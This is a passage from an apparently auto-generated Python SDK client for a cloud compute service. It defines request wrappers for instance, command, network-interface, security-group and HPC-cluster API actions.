resource_owner_id, "Memory": memory, "Cores": cores, "RegionId": region_id, "MigrateAcrossZone": migrate_across_zone, "InstanceType": instance_type, "ResourceId": resource_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OperationType": operation_type, "OwnerId": owner_id, "DestinationResource": destination_resource} return self._handle_request(api_request).result def describe_bandwidth_limitation( self, resource_owner_id=None, region_id=None, instance_type=None, instance_charge_type=None, resource_id=None, resource_owner_account=None, owner_account=None, operation_type=None, owner_id=None, spot_strategy=None): api_request = APIRequest('DescribeBandwidthLimitation', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "InstanceType": instance_type, "InstanceChargeType": instance_charge_type, "ResourceId": resource_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OperationType": operation_type, "OwnerId": owner_id, "SpotStrategy": spot_strategy} return self._handle_request(api_request).result def describe_available_resource( self, resource_owner_id=None, memory=None, io_optimized=None, data_disk_category=None, cores=None, region_id=None, system_disk_category=None, scope=None, instance_type=None, network_category=None, instance_charge_type=None, resource_owner_account=None, owner_account=None, dedicated_host_id=None, owner_id=None, resource_type=None, spot_strategy=None, destination_resource=None, zone_id=None): api_request = APIRequest('DescribeAvailableResource', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Memory": memory, "IoOptimized": io_optimized, "DataDiskCategory": data_disk_category, "Cores": cores, "RegionId": region_id, "SystemDiskCategory": system_disk_category, "Scope": scope, "InstanceType": instance_type, "NetworkCategory": network_category, "InstanceChargeType": instance_charge_type, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DedicatedHostId": dedicated_host_id, "OwnerId": owner_id, "ResourceType": resource_type, "SpotStrategy": spot_strategy, "DestinationResource": destination_resource, "ZoneId": zone_id} return self._handle_request(api_request).result def reactivate_instances( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('ReActivateInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_instances_full_status( self, list_of_event_id=None, resource_owner_id=None, page_number=None, region_id=None, page_size=None, event_publish_time_end=None, list_of_instance_event_type=None, resource_owner_account=None, owner_account=None, not_before_start=None, owner_id=None, event_publish_time_start=None, list_of_instance_id=None, not_before_end=None, health_status=None, event_type=None, status=None): api_request = APIRequest('DescribeInstancesFullStatus', 'GET', 'http', 'RPC', 'query') api_request._params = { "EventId": list_of_event_id, "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "EventPublishTime.End": event_publish_time_end, "InstanceEventType": list_of_instance_event_type, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "NotBefore.Start": not_before_start, "OwnerId": owner_id, "EventPublishTime.Start": event_publish_time_start, "InstanceId": list_of_instance_id, "NotBefore.End": not_before_end, "HealthStatus": health_status, "EventType": event_type, "Status": status} repeat_info = {"EventId": ('EventId', 'list', 'str', None), "InstanceEventType": ('InstanceEventType', 'list', 'str', None), "InstanceId": ('InstanceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_instance_history_events( self, list_of_event_id=None, resource_owner_id=None, event_cycle_status=None, page_number=None, region_id=None, page_size=None, list_of_instance_event_cycle_status=None, event_publish_time_end=None, list_of_instance_event_type=None, resource_owner_account=None, owner_account=None, not_before_start=None, owner_id=None, event_publish_time_start=None, instance_id=None, not_before_end=None, event_type=None): api_request = APIRequest('DescribeInstanceHistoryEvents', 'GET', 'http', 'RPC', 'query') api_request._params = { "EventId": list_of_event_id, "ResourceOwnerId": resource_owner_id, "EventCycleStatus": event_cycle_status, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "InstanceEventCycleStatus": list_of_instance_event_cycle_status, "EventPublishTime.End": event_publish_time_end, "InstanceEventType": list_of_instance_event_type, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "NotBefore.Start": not_before_start, "OwnerId": owner_id, "EventPublishTime.Start": event_publish_time_start, "InstanceId": instance_id, "NotBefore.End": not_before_end, "EventType": event_type} repeat_info = { "EventId": ( 'EventId', 'list', 'str', None), "InstanceEventCycleStatus": ( 'InstanceEventCycleStatus', 'list', 'str', None), "InstanceEventType": ( 'InstanceEventType', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_disks_full_status( self, list_of_event_id=None, resource_owner_id=None, page_number=None, event_time_start=None, region_id=None, page_size=None, list_of_disk_id=None, resource_owner_account=None, owner_account=None, owner_id=None, event_time_end=None, health_status=None, event_type=None, status=None): api_request = APIRequest('DescribeDisksFullStatus', 'GET', 'http', 'RPC', 'query') api_request._params = { "EventId": list_of_event_id, "ResourceOwnerId": resource_owner_id, "PageNumber": page_number, "EventTime.Start": event_time_start, "RegionId": region_id, "PageSize": page_size, "DiskId": list_of_disk_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "EventTime.End": event_time_end, "HealthStatus": health_status, "EventType": event_type, "Status": status} repeat_info = {"EventId": ('EventId', 'list', 'str', None), "DiskId": ('DiskId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_user_business_behavior( self, resource_owner_id=None, region_id=None, status_value=None, resource_owner_account=None, owner_account=None, owner_id=None, status_key=None): api_request = APIRequest('ModifyUserBusinessBehavior', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "statusValue": status_value, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "statusKey": status_key} return self._handle_request(api_request).result def describe_user_business_behavior( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, status_key=None): api_request = APIRequest('DescribeUserBusinessBehavior', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "statusKey": status_key} return self._handle_request(api_request).result def run_instances( self, launch_template_name=None, resource_owner_id=None, unique_suffix=None, hpc_cluster_id=None, security_enhancement_strategy=None, key_pair_name=None, min_amount=None, spot_price_limit=None, deletion_protection=None, resource_group_id=None, host_name=None, password=, storage_set_partition_number=None, list_of_tag=None, auto_renew_period=None, period=None, dry_run=None, launch_template_id=None, ipv6_address_count=None, owner_id=None, capacity_reservation_preference=None, vswitch_id=None, spot_strategy=None, private_ip_address=None, period_unit=None, instance_name=None, auto_renew=None, internet_charge_type=None, zone_id=None, list_of_ipv6_address=None, internet_max_bandwidth_in=None, affinity=None, image_id=None, spot_interruption_behavior=None, client_token=, io_optimized=None, security_group_id=None, internet_max_bandwidth_out=None, description=None, system_disk_category=None, capacity_reservation_id=None, system_disk_performance_level=None, user_data=None, password_inherit=None, region_id=None, instance_type=None, hibernation_configured=None, instance_charge_type=None, list_of_network_interface=None, deployment_set_id=None, amount=None, resource_owner_account=None, owner_account=None, tenancy=None, system_disk_disk_name=None, ram_role_name=None, auto_release_time=None, dedicated_host_id=None, credit_specification=None, list_of_security_group_ids=None, list_of_data_disk=None, launch_template_version=None, storage_set_id=None, system_disk_size=None, system_disk_description=None): api_request = APIRequest('RunInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "LaunchTemplateName": launch_template_name, "ResourceOwnerId": resource_owner_id, "UniqueSuffix": unique_suffix, "HpcClusterId": hpc_cluster_id, "SecurityEnhancementStrategy": security_enhancement_strategy, "KeyPairName": key_pair_name, "MinAmount": min_amount, "SpotPriceLimit": spot_price_limit, "DeletionProtection": deletion_protection, "ResourceGroupId": resource_group_id, "HostName": host_name, "Password": password, "StorageSetPartitionNumber": storage_set_partition_number, "Tag": list_of_tag, "AutoRenewPeriod": auto_renew_period, "Period": period, "DryRun": dry_run, "LaunchTemplateId": launch_template_id, "Ipv6AddressCount": ipv6_address_count, "OwnerId": owner_id, "CapacityReservationPreference": capacity_reservation_preference, "VSwitchId": vswitch_id, "SpotStrategy": spot_strategy, "PrivateIpAddress": private_ip_address, "PeriodUnit": period_unit, "InstanceName": instance_name, "AutoRenew": auto_renew, "InternetChargeType": internet_charge_type, "ZoneId": zone_id, "Ipv6Address": list_of_ipv6_address, "InternetMaxBandwidthIn": internet_max_bandwidth_in, "Affinity": affinity, "ImageId": image_id, "SpotInterruptionBehavior": spot_interruption_behavior, "ClientToken": client_token, "IoOptimized": io_optimized, "SecurityGroupId": security_group_id, "InternetMaxBandwidthOut": internet_max_bandwidth_out, "Description": description, "SystemDisk.Category": system_disk_category, "CapacityReservationId": capacity_reservation_id, "SystemDisk.PerformanceLevel": system_disk_performance_level, "UserData": user_data, "PasswordInherit": password_inherit, "RegionId": region_id, "InstanceType": instance_type, "HibernationConfigured": hibernation_configured, "InstanceChargeType": instance_charge_type, "NetworkInterface": list_of_network_interface, "DeploymentSetId": deployment_set_id, "Amount": amount, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "Tenancy": tenancy, "SystemDisk.DiskName": system_disk_disk_name, "RamRoleName": ram_role_name, "AutoReleaseTime": auto_release_time, "DedicatedHostId": dedicated_host_id, "CreditSpecification": credit_specification, "SecurityGroupIds": list_of_security_group_ids, "DataDisk": list_of_data_disk, "LaunchTemplateVersion": launch_template_version, "StorageSetId": storage_set_id, "SystemDisk.Size": system_disk_size, "SystemDisk.Description": system_disk_description} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "Ipv6Address": ('Ipv6Address', 'list', 'str', None), "NetworkInterface": ('NetworkInterface', 'list', 'dict', [('PrimaryIpAddress', 'str', None, None), ('VSwitchId', 'str', None, None), ('SecurityGroupId', 'str', None, None), ('NetworkInterfaceName', 'str', None, None), ('Description', 'str', None, None), ]), "SecurityGroupIds": ('SecurityGroupIds', 'list', 'str', None), "DataDisk": ('DataDisk', 'list', 'dict', [('Size', 'str', None, None), ('SnapshotId', 'str', None, None), ('Category', 'str', None, None), ('Encrypted', 'str', None, None), ('KMSKeyId', 'str', None, None), ('DiskName', 'str', None, None), ('Description', 'str', None, None), ('Device', 'str', None, None), ('DeleteWithInstance', 'str', None, None), ('PerformanceLevel', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def convert_nat_public_ip_to_eip( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_id=None, instance_id=None): api_request = APIRequest('ConvertNatPublicIpToEip', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerId": owner_id, "InstanceId": instance_id} return self._handle_request(api_request).result def modify_hpc_cluster_attribute( self, resource_owner_id=None, hpc_cluster_id=None, client_token=None, description=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, name=None): api_request = APIRequest('ModifyHpcClusterAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "HpcClusterId": hpc_cluster_id, "ClientToken": client_token, "Description": description, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "Name": name} return self._handle_request(api_request).result def describe_hpc_clusters( self, resource_owner_id=None, client_token=None, page_number=None, region_id=None, page_size=None, resource_owner_account=None, owner_account=None, owner_id=None, hpc_cluster_ids=None): api_request = APIRequest('DescribeHpcClusters', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "HpcClusterIds": hpc_cluster_ids} return self._handle_request(api_request).result def delete_hpc_cluster( self, resource_owner_id=None, hpc_cluster_id=None, client_token=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteHpcCluster', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "HpcClusterId": hpc_cluster_id, "ClientToken": client_token, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def create_hpc_cluster( self, resource_owner_id=None, client_token=None, description=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, name=None): api_request = APIRequest('CreateHpcCluster', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "Description": description, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "Name": name} return self._handle_request(api_request).result def describe_snapshots_usage( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeSnapshotsUsage', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_spot_price_history( self, resource_owner_id=None, io_optimized=None, network_type=None, start_time=None, region_id=None, instance_type=None, offset=None, resource_owner_account=None, owner_account=None, end_time=None, os_type=None, owner_id=None, zone_id=None): api_request = APIRequest('DescribeSpotPriceHistory', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "IoOptimized": io_optimized, "NetworkType": network_type, "StartTime": start_time, "RegionId": region_id, "InstanceType": instance_type, "Offset": offset, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "EndTime": end_time, "OSType": os_type, "OwnerId": owner_id, "ZoneId": zone_id} return self._handle_request(api_request).result def stop_invocation( self, resource_owner_id=None, region_id=None, invoke_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_instance_id=None): api_request = APIRequest('StopInvocation', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "InvokeId": invoke_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": list_of_instance_id} repeat_info = {"InstanceId": ('InstanceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_command( self, resource_owner_id=None, working_dir=None, description=None, command_id=None, command_content=None, timeout=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, name=None): api_request = APIRequest('ModifyCommand', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "WorkingDir": working_dir, "Description": description, "CommandId": command_id, "CommandContent": command_content, "Timeout": timeout, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "Name": name} return self._handle_request(api_request).result def invoke_command( self, resource_owner_id=None, command_id=None, frequency=None, region_id=None, timed=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_instance_id=None, parameters=None): api_request = APIRequest('InvokeCommand', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "CommandId": command_id, "Frequency": frequency, "RegionId": region_id, "Timed": timed, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": list_of_instance_id, "Parameters": parameters} repeat_info = {"InstanceId": ('InstanceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def describe_invocations( self, resource_owner_id=None, invoke_status=None, command_id=None, page_number=None, region_id=None, page_size=None, invoke_id=None, timed=None, command_name=None, resource_owner_account=None, owner_account=None, owner_id=None, command_type=None, instance_id=None): api_request = APIRequest('DescribeInvocations', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InvokeStatus": invoke_status, "CommandId": command_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "InvokeId": invoke_id, "Timed": timed, "CommandName": command_name, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "CommandType": command_type, "InstanceId": instance_id} return self._handle_request(api_request).result def describe_invocation_results( self, resource_owner_id=None, command_id=None, page_number=None, region_id=None, page_size=None, invoke_id=None, resource_owner_account=None, owner_account=None, owner_id=None, instance_id=None, invoke_record_status=None, include_history=None): api_request = APIRequest('DescribeInvocationResults', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "CommandId": command_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "InvokeId": invoke_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": instance_id, "InvokeRecordStatus": invoke_record_status, "IncludeHistory": include_history} return self._handle_request(api_request).result def describe_commands( self, resource_owner_id=None, description=None, type_=None, command_id=None, page_number=None, region_id=None, page_size=None, resource_owner_account=None, owner_account=None, owner_id=None, name=None): api_request = APIRequest('DescribeCommands', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Description": description, "Type": type_, "CommandId": command_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "Name": name} return self._handle_request(api_request).result def delete_command( self, resource_owner_id=None, command_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteCommand', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "CommandId": command_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def create_command( self, resource_owner_id=None, working_dir=None, description=None, type_=None, command_content=None, timeout=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, name=None, enable_parameter=None): api_request = APIRequest('CreateCommand', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "WorkingDir": working_dir, "Description": description, "Type": type_, "CommandContent": command_content, "Timeout": timeout, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "Name": name, "EnableParameter": enable_parameter} return self._handle_request(api_request).result def modify_security_group_egress_rule( self, nic_type=None, resource_owner_id=None, source_port_range=None, client_token=None, security_group_id=None, description=None, region_id=None, ipv6_dest_cidr_ip=None, ipv6_source_cidr_ip=None, policy=None, port_range=None, resource_owner_account=None, ip_protocol=None, owner_account=None, source_cidr_ip=None, dest_group_id=None, owner_id=None, dest_group_owner_account=None, priority=None, dest_cidr_ip=None, dest_group_owner_id=None): api_request = APIRequest('ModifySecurityGroupEgressRule', 'GET', 'http', 'RPC', 'query') api_request._params = { "NicType": nic_type, "ResourceOwnerId": resource_owner_id, "SourcePortRange": source_port_range, "ClientToken": client_token, "SecurityGroupId": security_group_id, "Description": description, "RegionId": region_id, "Ipv6DestCidrIp": ipv6_dest_cidr_ip, "Ipv6SourceCidrIp": ipv6_source_cidr_ip, "Policy": policy, "PortRange": port_range, "ResourceOwnerAccount": resource_owner_account, "IpProtocol": ip_protocol, "OwnerAccount": owner_account, "SourceCidrIp": source_cidr_ip, "DestGroupId": dest_group_id, "OwnerId": owner_id, "DestGroupOwnerAccount": dest_group_owner_account, "Priority": priority, "DestCidrIp": dest_cidr_ip, "DestGroupOwnerId": dest_group_owner_id} return self._handle_request(api_request).result def modify_disk_charge_type( self, resource_owner_id=None, disk_charge_type=None, instance_id=None, auto_pay=None, resource_owner_account=None, region_id=None, client_token=None, owner_account=None, disk_ids=None, owner_id=None): api_request = APIRequest('ModifyDiskChargeType', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "DiskChargeType": disk_charge_type, "InstanceId": instance_id, "AutoPay": auto_pay, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ClientToken": client_token, "OwnerAccount": owner_account, "DiskIds": disk_ids, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_network_interface_attribute( self, resource_owner_id=None, list_of_security_group_id=None, description=None, region_id=None, network_interface_name=None, resource_owner_account=None, owner_account=None, owner_id=None, network_interface_id=None): api_request = APIRequest('ModifyNetworkInterfaceAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SecurityGroupId": list_of_security_group_id, "Description": description, "RegionId": region_id, "NetworkInterfaceName": network_interface_name, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "NetworkInterfaceId": network_interface_id} repeat_info = {"SecurityGroupId": ('SecurityGroupId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def detach_network_interface( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, instance_id=None, network_interface_id=None): api_request = APIRequest('DetachNetworkInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": instance_id, "NetworkInterfaceId": network_interface_id} return self._handle_request(api_request).result def describe_network_interfaces( self, resource_owner_id=None, service_managed=None, security_group_id=None, type_=None, page_number=None, resource_group_id=None, region_id=None, page_size=None, list_of_tag=None, network_interface_name=None, resource_owner_account=None, owner_account=None, owner_id=None, vswitch_id=None, list_of_private_ip_address=None, instance_id=None, vpc_id=None, primary_ip_address=None, list_of_network_interface_id=None): api_request = APIRequest('DescribeNetworkInterfaces', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ServiceManaged": service_managed, "SecurityGroupId": security_group_id, "Type": type_, "PageNumber": page_number, "ResourceGroupId": resource_group_id, "RegionId": region_id, "PageSize": page_size, "Tag": list_of_tag, "NetworkInterfaceName": network_interface_name, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "VSwitchId": vswitch_id, "PrivateIpAddress": list_of_private_ip_address, "InstanceId": instance_id, "VpcId": vpc_id, "PrimaryIpAddress": primary_ip_address, "NetworkInterfaceId": list_of_network_interface_id} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "PrivateIpAddress": ('PrivateIpAddress', 'list', 'str', None), "NetworkInterfaceId": ('NetworkInterfaceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_network_interface( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, network_interface_id=None): api_request = APIRequest('DeleteNetworkInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "NetworkInterfaceId": network_interface_id} return self._handle_request(api_request).result def create_network_interface( self, resource_owner_id=None, client_token=None, security_group_id=None, description=None, business_type=None, resource_group_id=None, region_id=None, list_of_tag=None, network_interface_name=None, visible=None, resource_owner_account=None, owner_account=None, owner_id=None, vswitch_id=None, primary_ip_address=None): api_request = APIRequest('CreateNetworkInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "SecurityGroupId": security_group_id, "Description": description, "BusinessType": business_type, "ResourceGroupId": resource_group_id, "RegionId": region_id, "Tag": list_of_tag, "NetworkInterfaceName": network_interface_name, "Visible": visible, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "VSwitchId": vswitch_id, "PrimaryIpAddress": primary_ip_address} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def attach_network_interface( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, instance_id=None, network_interface_id=None): api_request = APIRequest('AttachNetworkInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": instance_id, "NetworkInterfaceId": network_interface_id} return self._handle_request(api_request).result def describe_recommend_instance_type( self, resource_owner_id=None, resource_owner_account=None, owner_account=None, channel=None, network_type=None, owner_id=None, operator=None, token=None, scene=None, region_id=None, instance_type=None, proxy_id=None): api_request = APIRequest('DescribeRecommendInstanceType', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "channel": channel, "NetworkType": network_type, "OwnerId": owner_id, "operator": operator, "token": token, "Scene": scene, "RegionId": region_id, "InstanceType": instance_type, "proxyId": proxy_id} return self._handle_request(api_request).result def modify_prepay_instance_spec( self, resource_owner_id=None, auto_pay=None, resource_owner_account=None, client_token=None, owner_account=None, end_time=None, owner_id=None, operator_type=None, system_disk_category=None, reboot_time=None, instance_id=None, region_id=None, migrate_across_zone=None, instance_type=None): api_request = APIRequest('ModifyPrepayInstanceSpec', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "AutoPay": auto_pay, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "EndTime": end_time, "OwnerId": owner_id, "OperatorType": operator_type, "SystemDisk.Category": system_disk_category, "RebootTime": reboot_time, "InstanceId": instance_id, "RegionId": region_id, "MigrateAcrossZone": migrate_across_zone, "InstanceType": instance_type} return self._handle_request(api_request).result def modify_instance_charge_type( self, resource_owner_id=None, period=None, dry_run=None, auto_pay=None, include_data_disks=None, resource_owner_account=None, client_token=None, owner_account=None, owner_id=None, period_unit=None, instance_ids=None, region_id=None, is_detail_fee=None, instance_charge_type=None): api_request = APIRequest('ModifyInstanceChargeType', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Period": period, "DryRun": dry_run, "AutoPay": auto_pay, "IncludeDataDisks": include_data_disks, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "OwnerId": owner_id, "PeriodUnit": period_unit, "InstanceIds": instance_ids, "RegionId": region_id, "IsDetailFee": is_detail_fee, "InstanceChargeType": instance_charge_type} return self._handle_request(api_request).result def join_resource_group( self, resource_group_id=None, resource_owner_id=None, resource_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None, resource_type=None): api_request = APIRequest('JoinResourceGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceGroupId": resource_group_id, "ResourceOwnerId": resource_owner_id, "ResourceId": resource_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id, "ResourceType": resource_type} return self._handle_request(api_request).result def modify_security_group_policy( self, resource_owner_id=None, region_id=None, client_token=None, resource_owner_account=None, owner_account=None, security_group_id=None, owner_id=None, inner_access_policy=None): api_request = APIRequest('ModifySecurityGroupPolicy', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ClientToken": client_token, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SecurityGroupId": security_group_id, "OwnerId": owner_id, "InnerAccessPolicy": inner_access_policy} return self._handle_request(api_request).result def describe_security_group_references( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, list_of_security_group_id=None, owner_id=None): api_request = APIRequest('DescribeSecurityGroupReferences', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SecurityGroupId": list_of_security_group_id, "OwnerId": owner_id} repeat_info = {"SecurityGroupId": ('SecurityGroupId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def detach_classic_link_vpc( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, vpc_id=None, owner_id=None): api_request = APIRequest('DetachClassicLinkVpc', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VpcId": vpc_id, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_classic_link_instances( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, vpc_id=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeClassicLinkInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VpcId": vpc_id, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def attach_classic_link_vpc( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, vpc_id=None, owner_id=None): api_request = APIRequest('AttachClassicLinkVpc', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VpcId": vpc_id, "OwnerId": owner_id} return self._handle_request(api_request).result def detach_instance_ram_role( self, resource_owner_id=None, resource_owner_account=None, region_id=None, 